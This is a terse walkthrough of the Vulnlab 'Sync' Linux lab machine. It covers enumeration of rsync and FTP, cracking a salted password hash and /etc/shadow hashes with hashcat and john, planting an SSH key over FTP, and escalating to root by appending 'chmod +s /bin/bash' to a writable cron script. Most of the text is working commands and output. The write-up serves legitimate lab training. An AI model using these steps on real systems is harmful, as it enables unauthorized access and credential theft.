vulnlab sync
an easy linux box
nmap scan
# Nmap 7.93 scan initiated Mon Aug 19 11:03:10 2024 as: nmap -A -oN sync.nmap 10.10.93.172 Nmap scan report for 10.10.93.172 Host is up (0.023s latency). Not shown: 996 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.5 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4b1533cc6cce0953f8f37d3b082785fa (ECDSA) |_ 256 18fd36c6a505b196147283f862d53821 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-title: Login | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.52 (Ubuntu) 873/tcp open rsync (protocol version 31) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Aug 19 11:03:18 2024 -- 1 IP address (1 host up) scanned in 8.51 seconds
rsync -av --list-only rsync://10.10.93.172/
using rsync getting the source file of website
rsync -av rsync://10.10.93.172:873/httpd ./rsyn_shared
.
found that the hash is combination of three things $secure|$username|$password here the secure hash is working as salt
a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e282ad3105de01e|triss|
hashcat can crack this one
hashcat -a 0 -m 20 hash.txt /usr/share/wordlists/rockyou.txt -o crackedtriss.txt
We can now ftp to the box ,make a folder .ssh , and upload there our authorized_keys file (id_rsa.pub)
┌──(puck㉿kali)-[~/vulnlab/sync] └─$ ftp 10.10.93.172 Connected to 10.10.93.172. 220 (vsFTPd 3.0.5) Name (10.10.93.172:puck): triss 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 229 Entering Extended Passive Mode (|||41121|) 150 Here comes the directory listing. drwxr-x--- 2 1003 1003 4096 Apr 21 2023 . drwxr-x--- 2 1003 1003 4096 Apr 21 2023 .. lrwxrwxrwx 1 0 0 9 Apr 21 2023 .bash_history -> /dev/null -rw-r--r-- 1 1003 1003 220 Apr 19 2023 .bash_logout -rw-r--r-- 1 1003 1003 3771 Apr 19 2023 .bashrc -rw-r--r-- 1 1003 1003 807 Apr 19 2023 .profile 226 Directory send OK. ftp> mkdir .ssh 257 "/.ssh" created ftp> cd .ssh 250 Directory successfully changed. ftp> put authorized_keys local: authorized_keys remote: authorized_keys 229 Entering Extended Passive Mode (|||6569|) 150 Ok to send data. 100% |************************************************************************| 91 612.87 KiB/s 00:00 ETA 226 Transfer complete. 91 bytes sent in 00:00 (2.32 KiB/s) ftp> ls 229 Entering Extended Passive Mode (|||65353|) 150 Here comes the directory listing. -rw------- 1 1003 1003 91 Aug 19 09:11 authorized_keys 226 Directory send OK.
.
ssh -i ed_25519 triss@10.10.93.172
found a user in /etc/paswwd jenifier , su jennifer (with same pass as triss)
there is a zip file in the /backup directory that is a backup owned by root.
timeout 60s ./pspy64
getting the zip
wget http://10.8.2.138:8000/1698154321.zip
unshadow
$ unshadow passwd shadow > unshadow
crack it
john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow
User sa has write permission to this shell script.
echo "chmod +s /bin/bash" >> /usr/local/bin/backup.sh cat /usr/local/bin/backup.sh #!/bin/bash mkdir -p /tmp/backup cp -r /opt/httpd /tmp/backup cp /etc/passwd /tmp/backup cp /etc/shadow /tmp/backup cp /etc/rsyncd.conf /tmp/backup zip -r /backup/$(date +%s).zip /tmp/backup rm -rf /tmp/backup chmod +s /bin/bash
wait a minute
/bin/bash -p bash-5.1# id uid=1001(sa) gid=1001(sa) euid=0(root) egid=0(root) groups=0(root),1001(sa) bash-5.1#
that’s all